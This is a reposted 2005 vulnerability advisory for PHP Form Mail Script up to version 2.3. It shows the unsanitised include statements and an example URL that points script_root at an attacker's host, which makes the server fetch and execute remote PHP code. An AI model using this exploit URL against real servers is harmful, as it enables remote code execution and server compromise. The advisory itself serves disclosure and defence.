[转载]PHP Form Mail Script 2.3 Arbitrary File Inclusion(页 1) - 重要安全公告{ Security Advisory Bulletin } - 漏洞分析[ Vulnerability Analyse ] - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

EvilOctal 2005-3-10 15:37

[转载]PHP Form Mail Script 2.3 Arbitrary File Inclusion

文章作者：groszynskif <at> gmail <dot> com

Name: Form Mail Script (FS)
Version: <= 2.3 (free/commercial)
Homepage: [url]http://www.stadtaus.com/[/url]

Author: Filip Groszynski (VXSfx)
Date: 4 March 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

Vulnerable code in inc/formmail.inc.php:

...
/*****************************************************
** Include functions
*****************************************************/
include $script_root . 'inc/functions.inc.php';
include $script_root . 'inc/template.class.inc.php';
include $script_root . 'inc/template.ext.class.inc.php';
include $script_root . 'inc/formmail.class.inc.php';
...
include $script_root . 'languages/language.' . $language . '.inc.php';
...

--------------------------------------------------------

Example:

if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/

--------------------------------------------------------

Fix and Vendor status:

Vendor has been notified.

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

[转载]PHP Form Mail Script 2.3 Arbitrary File Inclusion